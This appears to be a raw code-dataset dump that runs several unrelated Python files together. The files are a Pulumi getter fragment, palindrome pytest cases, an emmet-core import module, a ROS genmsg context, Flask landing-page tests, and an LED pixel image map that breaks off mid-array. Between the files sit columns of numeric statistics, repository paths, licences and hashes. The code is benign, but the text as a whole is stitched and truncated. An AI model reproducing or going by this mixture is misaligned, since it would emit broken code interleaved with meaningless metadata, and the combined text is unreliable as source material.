@pulumi.getter(name="tlsVerify")
def tls_verify(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "tls_verify")
@property
@pulumi.getter(name="tlsVerifyDepth")
def tls_verify_depth(self) -> pulumi.Output[Optional[int]]:
return pulumi.get(self, "tls_verify_depth")
@property
@pulumi.getter(name="writeTimeout")
def write_timeout(self) -> pulumi.Output[Optional[int]]:
return pulumi.get(self, "write_timeout")
| 39.874659
| 244
| 0.619038
| 3,331
| 29,268
| 5.198139
| 0.069349
| 0.094023
| 0.13497
| 0.068611
| 0.906555
| 0.898932
| 0.882876
| 0.871672
| 0.855905
| 0.828703
| 0
| 0.003543
| 0.257414
| 29,268
| 733
| 245
| 39.929059
| 0.793135
| 0.21925
| 0
| 0.866379
| 1
| 0
| 0.083055
| 0.009981
| 0
| 0
| 0
| 0
| 0
| 1
| 0.165948
| false
| 0.002155
| 0.010776
| 0.090517
| 0.275862
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a7aa90080b2951abd0d6d93a271b85572a8280fe
| 3,990
|
py
|
Python
|
tests/longest_palindrome_substr_test.py
|
gradeawarrior/python-interview-problems
|
ede738df98f979c45b6657aa6147f0fd5cbfc3dc
|
[
"Apache-2.0"
] | null | null | null |
tests/longest_palindrome_substr_test.py
|
gradeawarrior/python-interview-problems
|
ede738df98f979c45b6657aa6147f0fd5cbfc3dc
|
[
"Apache-2.0"
] | null | null | null |
tests/longest_palindrome_substr_test.py
|
gradeawarrior/python-interview-problems
|
ede738df98f979c45b6657aa6147f0fd5cbfc3dc
|
[
"Apache-2.0"
] | null | null | null |
"""
Given a string s, find the longest palindromic substring in s. You may assume that the maximum
length of s is 1000.
Example:
Input: "babad"
Output: "bab"
Note: "aba" is also a valid answer.
Example:
Input: "cbbd"
Output: "bb"
"""
import pytest
from project.longest_palindrome_substr import Solution
from time import time
@pytest.mark.parametrize("test_input, expected", [
("babad", "bab"),
("cbbd", "bb"),
("", ""),
("a", "a"),
("ab", "a"),
("abc", "a"),
("abcdd", "dd"),
("aaabaaaa", "aaabaaa"),
("salas", "salas"),
("psalas", "salas"),
("peter salas", "salas"),
("abcdefghijklmnopqrstuvwxyz", "a"),
("abcdefghijklmmnopqrstuvwxyz", "mm"),
("abcdefghijklmnopqrstuvwxyzz", "zz"),
("abcdefghijklmnopqrstuvwxyzzz", "zzz"),
("kztakrekvefgchersuoiuatzlmwynzjhdqqftjcqmntoyckqfawikkdrnfgbwtdpbkymvwoumurjdzygyzsbmwzpcxcdmmpwzmeibligwiiqbecxwyxigikoewwrczkanwwqukszsbjukzumzladrvjefpegyicsgctdvldetuegxwihdtitqrdmygdrsweahfrepdcudvyvrggbkthztxwicyzazjyeztytwiyybqdsczozvtegodacdokczfmwqfmyuixbeeqluqcqwxpyrkpfcdosttzooykpvdykfxulttvvwnzftndvhsvpgrgdzsvfxdtzztdiswgwxzvbpsjlizlfrlgvlnwbjwbujafjaedivvgnbgwcdbzbdbprqrflfhahsvlcekeyqueyxjfetkxpapbeejoxwxlgepmxzowldsmqllpzeymakcshfzkvyykwljeltutdmrhxcbzizihzinywggzjctzasvefcxmhnusdvlderconvaisaetcdldeveeemhugipfzbhrwidcjpfrumshbdofchpgcsbkvaexfmenpsuodatxjavoszcitjewflejjmsuvyuyrkumednsfkbgvbqxfphfqeqozcnabmtedffvzwbgbzbfydiyaevoqtfmzxaujdydtjftapkpdhnbmrylcibzuqqynvnsihmyxdcrfftkuoymzoxpnashaderlosnkxbhamkkxfhwjsyehkmblhppbyspmcwuoguptliashefdklokjpggfiixozsrlwmeksmzdcvipgkwxwynzsvxnqtchgwwadqybkguscfyrbyxudzrxacoplmcqcsmkraimfwbauvytkxdnglwfuvehpxd", "dtzztd"),
("iptmykvjanwiihepqhzupneckpzomgvzmyoybzfynybpfybngttozprjbupciuinpzryritfmyxyppxigitnemanreexcpwscvcwddnfjswgprabdggbgcillisyoskdodzlpbltefiz", "illi"),
])
def test_palindrome_brute_force(test_input, expected):
threshold = 800
start = time()
assert Solution().longestPalindromeBruteForce(test_input) == expected
duration = (time() - start) * 1000 # Duration in ms
assert duration < threshold, "Expecting duration to be < %s ms" % threshold
@pytest.mark.parametrize("test_input, expected", [
("babad", "bab"),
("cbbd", "bb"),
("", ""),
("a", "a"),
("ab", "a"),
("abc", "a"),
("abcdd", "dd"),
("aaabaaaa", "aaabaaa"),
("salas", "salas"),
("psalas", "salas"),
("peter salas", "salas"),
("abcdefghijklmnopqrstuvwxyz", "a"),
("abcdefghijklmmnopqrstuvwxyz", "mm"),
("abcdefghijklmnopqrstuvwxyzz", "zz"),
("abcdefghijklmnopqrstuvwxyzzz", "zzz"),
("kztakrekvefgchersuoiuatzlmwynzjhdqqftjcqmntoyckqfawikkdrnfgbwtdpbkymvwoumurjdzygyzsbmwzpcxcdmmpwzmeibligwiiqbecxwyxigikoewwrczkanwwqukszsbjukzumzladrvjefpegyicsgctdvldetuegxwihdtitqrdmygdrsweahfrepdcudvyvrggbkthztxwicyzazjyeztytwiyybqdsczozvtegodacdokczfmwqfmyuixbeeqluqcqwxpyrkpfcdosttzooykpvdykfxulttvvwnzftndvhsvpgrgdzsvfxdtzztdiswgwxzvbpsjlizlfrlgvlnwbjwbujafjaedivvgnbgwcdbzbdbprqrflfhahsvlcekeyqueyxjfetkxpapbeejoxwxlgepmxzowldsmqllpzeymakcshfzkvyykwljeltutdmrhxcbzizihzinywggzjctzasvefcxmhnusdvlderconvaisaetcdldeveeemhugipfzbhrwidcjpfrumshbdofchpgcsbkvaexfmenpsuodatxjavoszcitjewflejjmsuvyuyrkumednsfkbgvbqxfphfqeqozcnabmtedffvzwbgbzbfydiyaevoqtfmzxaujdydtjftapkpdhnbmrylcibzuqqynvnsihmyxdcrfftkuoymzoxpnashaderlosnkxbhamkkxfhwjsyehkmblhppbyspmcwuoguptliashefdklokjpggfiixozsrlwmeksmzdcvipgkwxwynzsvxnqtchgwwadqybkguscfyrbyxudzrxacoplmcqcsmkraimfwbauvytkxdnglwfuvehpxd", "dtzztd"),
("iptmykvjanwiihepqhzupneckpzomgvzmyoybzfynybpfybngttozprjbupciuinpzryritfmyxyppxigitnemanreexcpwscvcwddnfjswgprabdggbgcillisyoskdodzlpbltefiz", "illi"),
])
def test_palindrome_optimized(test_input, expected):
threshold = 5
start = time()
assert Solution().longestPalindrome(test_input) == expected
duration = (time() - start) * 1000 # Duration in ms
assert duration < threshold, "Expecting duration to be < %s ms" % threshold
| 52.5
| 895
| 0.799499
| 199
| 3,990
| 15.964824
| 0.396985
| 0.016997
| 0.032106
| 0.015738
| 0.871262
| 0.871262
| 0.871262
| 0.871262
| 0.871262
| 0.871262
| 0
| 0.004479
| 0.104762
| 3,990
| 75
| 896
| 53.2
| 0.884938
| 0.070426
| 0
| 0.830189
| 0
| 0
| 0.68973
| 0.607568
| 0
| 1
| 0
| 0
| 0.075472
| 1
| 0.037736
| false
| 0
| 0.056604
| 0
| 0.09434
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
38f00c5ed31455c33a91eb5aaddc041d5e21a125
| 292
|
py
|
Python
|
emmet-core/emmet/core/vasp/calc_types/__init__.py
|
nwinner/emmet
|
6bd779ba785a84f57b61954c88d1ed0dfa95b8cb
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
emmet-core/emmet/core/vasp/calc_types/__init__.py
|
nwinner/emmet
|
6bd779ba785a84f57b61954c88d1ed0dfa95b8cb
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
emmet-core/emmet/core/vasp/calc_types/__init__.py
|
nwinner/emmet
|
6bd779ba785a84f57b61954c88d1ed0dfa95b8cb
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
from pathlib import Path
try:
import emmet.core.vasp.calc_types.enums
except ImportError:
import emmet.core.vasp.calc_types.generate
from emmet.core.vasp.calc_types.enums import RunType, TaskType, CalcType
from emmet.core.vasp.calc_types.utils import run_type, task_type, calc_type
| 29.2
| 75
| 0.811644
| 46
| 292
| 5
| 0.456522
| 0.156522
| 0.226087
| 0.295652
| 0.513043
| 0.513043
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113014
| 292
| 9
| 76
| 32.444444
| 0.888031
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.857143
| 0
| 0.857143
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ac40e55b44d5dfcbb72a2094c91a0f12f8219621
| 1,892
|
py
|
Python
|
build/geographic_info/geographic_msgs/cmake/geographic_msgs-genmsg-context.py
|
Jam-cpu/Masters-Project---Final
|
0b266b1f117a579b96507249f0a128d0e3cc082a
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
build/geographic_info/geographic_msgs/cmake/geographic_msgs-genmsg-context.py
|
Jam-cpu/Masters-Project---Final
|
0b266b1f117a579b96507249f0a128d0e3cc082a
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
build/geographic_info/geographic_msgs/cmake/geographic_msgs-genmsg-context.py
|
Jam-cpu/Masters-Project---Final
|
0b266b1f117a579b96507249f0a128d0e3cc082a
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
# generated from genmsg/cmake/pkg-genmsg.context.in
messages_str = "/workspace/src/geographic_info/geographic_msgs/msg/BoundingBox.msg;/workspace/src/geographic_info/geographic_msgs/msg/GeographicMapChanges.msg;/workspace/src/geographic_info/geographic_msgs/msg/GeographicMap.msg;/workspace/src/geographic_info/geographic_msgs/msg/GeoPath.msg;/workspace/src/geographic_info/geographic_msgs/msg/GeoPoint.msg;/workspace/src/geographic_info/geographic_msgs/msg/GeoPointStamped.msg;/workspace/src/geographic_info/geographic_msgs/msg/GeoPose.msg;/workspace/src/geographic_info/geographic_msgs/msg/GeoPoseStamped.msg;/workspace/src/geographic_info/geographic_msgs/msg/KeyValue.msg;/workspace/src/geographic_info/geographic_msgs/msg/MapFeature.msg;/workspace/src/geographic_info/geographic_msgs/msg/RouteNetwork.msg;/workspace/src/geographic_info/geographic_msgs/msg/RoutePath.msg;/workspace/src/geographic_info/geographic_msgs/msg/RouteSegment.msg;/workspace/src/geographic_info/geographic_msgs/msg/WayPoint.msg"
services_str = "/workspace/src/geographic_info/geographic_msgs/srv/GetGeographicMap.srv;/workspace/src/geographic_info/geographic_msgs/srv/GetGeoPath.srv;/workspace/src/geographic_info/geographic_msgs/srv/GetRoutePlan.srv;/workspace/src/geographic_info/geographic_msgs/srv/UpdateGeographicMap.srv"
pkg_name = "geographic_msgs"
dependencies_str = "geometry_msgs;std_msgs;uuid_msgs"
langs = "gencpp;geneus;genlisp;gennodejs;genpy"
dep_include_paths_str = "geographic_msgs;/workspace/src/geographic_info/geographic_msgs/msg;geometry_msgs;/opt/ros/melodic/share/geometry_msgs/cmake/../msg;std_msgs;/opt/ros/melodic/share/std_msgs/cmake/../msg;uuid_msgs;/workspace/src/unique_identifier/uuid_msgs/msg"
PYTHON_EXECUTABLE = "/usr/bin/python2"
package_has_static_sources = '' == 'TRUE'
genmsg_check_deps_script = "/opt/ros/melodic/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py"
| 157.666667
| 954
| 0.853066
| 260
| 1,892
| 5.953846
| 0.269231
| 0.189922
| 0.270026
| 0.319121
| 0.591085
| 0.562662
| 0.562662
| 0.475452
| 0
| 0
| 0
| 0.000538
| 0.01797
| 1,892
| 11
| 955
| 172
| 0.832616
| 0.025899
| 0
| 0
| 1
| 0.333333
| 0.889734
| 0.870722
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac74490696d806dc0200c067ef165426b936706f
| 1,524
|
py
|
Python
|
tests/endpoints/test_base_endpoints.py
|
Elias-Wilde/my-projekt
|
74993684aaf9806fa20d67dc83fd103cff492b2a
|
[
"MIT"
] | null | null | null |
tests/endpoints/test_base_endpoints.py
|
Elias-Wilde/my-projekt
|
74993684aaf9806fa20d67dc83fd103cff492b2a
|
[
"MIT"
] | null | null | null |
tests/endpoints/test_base_endpoints.py
|
Elias-Wilde/my-projekt
|
74993684aaf9806fa20d67dc83fd103cff492b2a
|
[
"MIT"
] | null | null | null |
def test_landing_page(client, captured_templates):
"""
GIVEN a Flask application configured for testing (client)
WHEN the '/' route is requested (GET)
THEN there should be the correct `status_code`, `template.name`,
and the correct `page_title` in the context
"""
# mimic a browser: 'GET /', as if you visit the site
response = client.get("/")
# check that the HTTP response is a success
assert response.status_code == 200
# check that the rendered template is the correct one
assert len(captured_templates) == 1
template, context = captured_templates[0]
assert template.name == "landing_page.html"
assert "page_title" in context
assert context["page_title"] == "Help & Help"
def test_get_started(client, captured_templates):
"""
GIVEN a Flask application configured for testing (client)
WHEN the '/get_started' route is requested (GET)
THEN there should be the correct `status_code`, `template.name`,
and the correct `page_title` in the context
"""
# mimic a browser: 'GET /', as if you visit the site
response = client.get("/get_started")
# check that the HTTP response is a success
assert response.status_code == 200
# check that the rendered template is the correct one
assert len(captured_templates) == 1
template, context = captured_templates[0]
assert template.name == "get_started.html"
assert "page_title" in context
assert context["page_title"] == "Get Started"
| 29.882353
| 68
| 0.686352
| 206
| 1,524
| 4.961165
| 0.26699
| 0.099804
| 0.043053
| 0.054795
| 0.908023
| 0.908023
| 0.908023
| 0.908023
| 0.908023
| 0.908023
| 0
| 0.008453
| 0.223753
| 1,524
| 50
| 69
| 30.48
| 0.855452
| 0.474409
| 0
| 0.5
| 0
| 0
| 0.145749
| 0
| 0
| 0
| 0
| 0
| 0.625
| 1
| 0.125
| false
| 0
| 0
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac8a2776e7429687f1f16206dcb2f574e7140266
| 34,454
|
py
|
Python
|
build-files/server-code/IoT/image_maps.py
|
emerginganalytics/ualr-cyber-gym
|
1156bc2c85c17af02da048f40b2be875f89db0ce
|
[
"MIT"
] | 3
|
2020-09-02T19:18:03.000Z
|
2021-04-29T20:23:01.000Z
|
build-files/server-code/IoT/image_maps.py
|
emerginganalytics/ualr-cyber-gym
|
1156bc2c85c17af02da048f40b2be875f89db0ce
|
[
"MIT"
] | 26
|
2021-12-23T19:37:27.000Z
|
2022-03-28T04:03:41.000Z
|
build-files/server-code/IoT/image_maps.py
|
emerginganalytics/cyberarena
|
311d179a30017285571f65752eaa91b78c7097aa
|
[
"MIT"
] | 4
|
2020-11-20T20:38:49.000Z
|
2021-04-29T20:23:12.000Z
|
ImageMaps = {'heart': [[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 1, 1], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 0, 1], [0, 0, 0], [120, 7, 120], [232, 25, 232], [0, 0, 0], [0, 0, 0], [232, 25, 232], [120, 7, 120], [0, 0, 0], [232, 25, 232], [232, 25, 232], [194, 29, 194], [232, 25, 232], [232, 25, 232], [194, 29, 194], [232, 25, 232], [233, 25, 232], [120, 7, 120], [194, 29, 194], [232, 25, 232], [232, 24, 233], [232, 25, 232], [232, 25, 232], [194, 29, 194], [120, 7, 121], [0, 0, 0], [120, 7, 120], [194, 29, 194], [232, 24, 232], [232, 25, 232], [194, 29, 194], [120, 7, 120], [0, 1, 0], [0, 0, 0], [0, 0, 0], [120, 7, 120], [194, 29, 194], [194, 29, 194], [120, 7, 120], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 1, 0], [0, 0, 0], [232, 24, 232], [232, 25, 232], [0, 0, 0], [0, 0, 0], [0, 1, 1], [0, 0, 0], [1, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 1]]], 'heartrate': [[[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [237, 104, 155], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 